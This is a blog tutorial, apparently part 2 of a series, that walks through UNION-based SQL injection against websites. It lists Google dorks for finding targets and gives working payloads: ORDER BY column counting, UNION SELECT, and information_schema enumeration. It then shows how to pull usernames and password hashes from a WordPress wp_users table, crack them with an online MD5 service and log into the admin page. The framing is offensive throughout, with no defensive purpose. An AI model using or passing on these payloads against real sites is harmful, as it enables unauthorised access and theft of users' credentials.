In my previous article i have given all the basic stuff regarding sql, today i will be directly getting into injection parts. If you have not read the previous part SQL injection Part 1 . Kindly go through it before reading this one.
Finding Out A Vulnerable Website
We can use google dorks to find vulnerable sites.If you want to find SQLi vulnerability on a particular website, then also you can use google dorks. All you need is a basic knowledge of advanced google searching.
Here are some google dorks.
inurl:article.php?ID=
inurl:newsDetail.php?id=
inurl:view.php?id=
inurl:page.php?id=
inurl:productdetail.php?id=
inurl:newsDetail.php?id=
inurl:view.php?id=
inurl:page.php?id=
inurl:productdetail.php?id=
Now we have to check for the vulnerability. To do this add a single quote(‘) at the end of the URL. If you get an error or blank page, the site is vulnerable to SQL injection.
Here i found a vulnerable link of a website.
When i add single quote at the end of the URL, some data of the page is missing. Hence we can determine that it is vulnerable to SQl injection.
Finding Out The Number Of Columns
Now our job is to find out the number of columns in the sites database in order to access it. We can find this by simply adding “order by “ query at the end as shown below.
www.vulnerablesite.com/view.php?id=47 order by 1— (no error)
It should return the page with no error.Now add one more column to the above query. It looks like
www.vulnerablesite.com/view.php?id=47 order by 2— (no error)
We should increase the count until we get an error. When we get an error, it means that there are no more columns to return the results.In my example i got an error at the following query.
www.vulnerablesite.com/view.php?id=47 order by 10— (error)
It means that the site has 9 columns.Finding Out The Most Vulnerable Volumn
When we are done with number of columns, we need to find the most vulnerable column. For this we use the following query.
www.vulnerablesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9—
It should return the most vulnerable columns.Some times it may not display the columns on your page. In such cases add ‘-‘ without quotes before your id number. This is to call a non existing page to display your data.Then the above query looks like
www.vulnerablesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9—
If you observe, i got 2 as the most vulnerable column.The most interesting part of our attack starts here. We need to extract the data from the database here.
Finding Out The Table Names
First we will find out the table names from database. Just add the following query to find the table names.
www.vulnerablesite.com/view.php?id=-47 union select 1,table_name ,3,4,5,6,7,8,9 from information_schema.tables—
It gives us a list of tables.
Now search for the tables you are interested in. It means, a hacker generally looks for the tables that contain usernames and passwords. So select a table you want.
Finding Out The Column Names
Now we need to extract the column names from the tables inorder to extract the data. We can find the column names using the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from information_schema.columns where table_name=’yourtablename’—
In my example the query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from information_schema.columns where table_name=’wp_users’—
it displays all the column names from the table ‘wp_users’
Extracting Data
Now we have to extract the information such as usernames, passwords etc.
We can do this as shown in the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from yourtablename—
In my example this query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,user_login ,3,4,5,6,7,8,9 from wp_users—
Similarly you can get the password using the same query by simply changing the column_name as user_pass in my example.Many websites store passwords using MD5 encryption. So we have to crack it using any MD5 cracker. www.md5cracker.co.uk is an online service to crack MD5 hashes. Then find out the admin page, and login to the website.
No comments:
Post a Comment